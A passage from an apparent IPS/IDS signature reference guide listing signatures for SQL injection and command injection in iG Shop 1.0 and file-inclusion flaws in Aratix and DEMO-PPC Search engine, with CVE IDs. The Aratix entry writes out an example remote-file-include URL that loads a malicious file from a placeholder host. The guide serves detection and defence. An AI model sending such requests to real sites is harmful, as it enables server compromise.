TMS zl Module IPS/IDS Signature Reference Guide RLX.10.2.2.94
BA413F034904. Upgrade to the latest version of WinZip (10.0 Build 7245 or later), available from the WinZip Web site.
Signature ID: 34100
IG Shop remote attackers execute arbitrary commands vulnerability
Threat Level: Severe
Industry ID: CVE-2007-0132
Bugtraq: 21874
Signature Description: IG Shop is a powerful, full-featured PHP and MySQL based shopping cart system that enables you
to create an online shop quickly. iG Shop 1.0 allows remote attackers to execute arbitrary code. The issue is due to input
validation errors in the scripts "compare_product.php" and "display_review.php", which do not validate the parameters "id" or
"user_login_cookie" before they are used in SQL statements. This could be exploited by malicious people to conduct
SQL injection attacks. No remedy.
Signature ID: 34101
IG Shop remote attackers execute arbitrary commands vulnerability
Threat Level: Severe
Industry ID: CVE-2007-0132
Bugtraq: 21874
Signature Description: IG Shop is a powerful, full-featured PHP and MySQL based shopping cart system that enables you
to create an online shop quickly. iG Shop 1.0 allows remote attackers to execute arbitrary code. The vulnerability is due to
input validation errors in "page.php" and "cart.php", which do not validate the "action" parameter before it is passed to an
"eval()" call. This may be exploited by remote attackers to inject and execute arbitrary commands with the privileges
of the web server.
Signature ID: 34102
IG Shop remote attackers execute arbitrary commands vulnerability
Threat Level: Severe
Industry ID: CVE-2007-0132
Bugtraq: 21874
Signature Description: IG Shop is a powerful, full-featured PHP and MySQL based shopping cart system that enables you
to create an online shop quickly. The iG Shop 1.0 vulnerability is due to input validation errors in "cart.php", which does not
validate the "action" parameter before it is used in SQL queries. This may be exploited by remote attackers to inject
and execute arbitrary commands with the privileges of the web server. No remedy.
Signature ID: 34103
Aratix Remote File Include Vulnerability
Threat Level: Severe
Industry ID: CVE-2007-0135
Signature Description: Aratix could allow a remote attacker to include arbitrary files. A remote attacker can send a
specially-crafted URL request to the "inc/init.inc.php" script, which does not validate the "current_path" parameter. This could
be used to upload a malicious file from another remote system via HTTP, HTTPS or FTP (
inc/init.inc.php?current_path=http://[target]/[path]/[maliciousfile] ). Once this malicious file executes on the target system,
the attacker can access whatever the malicious code allows.
Signature ID: 34104
DEMO PPC Search engine INC parameter file include vulnerability
Threat Level: Severe
Industry ID: CVE-2007-0167
Bugtraq: 21961
Signature Description: DEMO-PPC Search engine could allow a remote attacker to include arbitrary files. A remote
attacker can send a specially-crafted URL request to multiple scripts using the INC parameter to upload a malicious file